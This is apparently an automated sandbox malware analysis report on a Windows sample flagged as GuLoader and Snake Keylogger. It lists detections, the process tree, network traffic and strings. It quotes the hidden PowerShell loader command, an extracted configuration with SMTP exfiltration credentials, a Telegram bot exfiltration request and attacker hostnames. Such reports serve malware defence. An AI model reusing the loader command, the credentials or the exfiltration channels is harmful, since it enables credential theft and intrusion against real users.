Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rundholterne89.exe

Overview

General Information

Sample name:Rundholterne89.exe
Analysis ID:1539382
MD5:a1e239c4d5116e289ce0597a92844ede
SHA1:4562d452ccc32512291c3165a0b9b3c076b28094
SHA256:1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904
Tags:exevipkeyloggeruser-malwarelabnet
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Rundholterne89.exe (PID: 7992 cmdline: "C:\Users\user\Desktop\Rundholterne89.exe" MD5: A1E239C4D5116E289CE0597A92844EDE)
    • powershell.exe (PID: 8084 cmdline: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6624 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.1886651504.000000000936D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 6624JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 6624JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6624, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49709
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8084, TargetFilename: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 213.165.67.118, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6624, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49729
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)", CommandLine: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Rundholterne89.exe", ParentImage: C:\Users\user\Desktop\Rundholterne89.exe, ParentProcessId: 7992, ParentProcessName: Rundholterne89.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)", ProcessId: 8084, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-22T16:04:21.520222+020028033053Unknown Traffic192.168.2.1049713188.114.97.3443TCP
          2024-10-22T16:04:22.954475+020028033053Unknown Traffic192.168.2.1049715188.114.97.3443TCP
          2024-10-22T16:04:26.027860+020028033053Unknown Traffic192.168.2.1049719188.114.97.3443TCP
          2024-10-22T16:04:28.905367+020028033053Unknown Traffic192.168.2.1049723188.114.97.3443TCP
          2024-10-22T16:04:31.792925+020028033053Unknown Traffic192.168.2.1049727188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-22T16:04:19.358399+020028032742Potentially Bad Traffic192.168.2.1049711193.122.130.080TCP
          2024-10-22T16:04:20.811576+020028032742Potentially Bad Traffic192.168.2.1049711193.122.130.080TCP
          2024-10-22T16:04:22.249021+020028032742Potentially Bad Traffic192.168.2.1049714193.122.130.080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-22T16:04:14.198153+020028032702Potentially Bad Traffic192.168.2.1049709142.250.185.174443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Rundholterne89.exeAvira: detected
          Source: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exeAvira: detection malicious, Label: TR/AVI.Inj.npwdo
          Source: 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
          Source: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exeReversingLabs: Detection: 42%
          Source: Rundholterne89.exeReversingLabs: Detection: 42%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Rundholterne89.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49712 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.10:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.10:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49728 version: TLS 1.2
          Source: Rundholterne89.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1877824072.0000000006B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.1877824072.0000000006B74000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0031F45Dh6_2_0031F2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0031F45Dh6_2_0031F4AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0031FC19h6_2_0031F974
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DF31E0h6_2_25DF2DC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DF2C19h6_2_25DF2968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DF0D0Dh6_2_25DF0B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DF1697h6_2_25DF0B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DF31E0h6_2_25DF2DBB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFDC51h6_2_25DFD9A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFD7F9h6_2_25DFD550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DF31E0h6_2_25DF310E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFD3A1h6_2_25DFD0F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFCF49h6_2_25DFCCA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_25DF0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFFAB9h6_2_25DFF810
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFF661h6_2_25DFF3B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFF209h6_2_25DFEF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFEDB1h6_2_25DFEB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFE959h6_2_25DFE6B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFE501h6_2_25DFE258
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25DFE0A9h6_2_25DFDE00

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.10:49729 -> 213.165.67.118:587
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2022/10/2024%20/%2022:38:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49711 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49714 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49709 -> 142.250.185.174:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49715 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49723 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49727 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49719 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49713 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.10:49729 -> 213.165.67.118:587
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49712 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2022/10/2024%20/%2022:38:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: smtp.ionos.es
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 22 Oct 2024 14:04:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000006.00000002.2625379700.0000000023389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
          Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.geotrust.com/GeoTrustTLSRSACAG1.crt0
          Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdp.geotrust.com/GeoTrustTLSRSACAG1.crl0v
          Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
          Source: Rundholterne89.exe, Rundholterne89.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Rundholterne89.exe, Rundholterne89.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
          Source: powershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.1859059951.0000000004551000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msiexec.exe, 00000006.00000002.2625379700.0000000023389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.ionos.es
          Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://status.geotrust.com0
          Source: msiexec.exe, 00000006.00000002.2625379700.0000000023211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
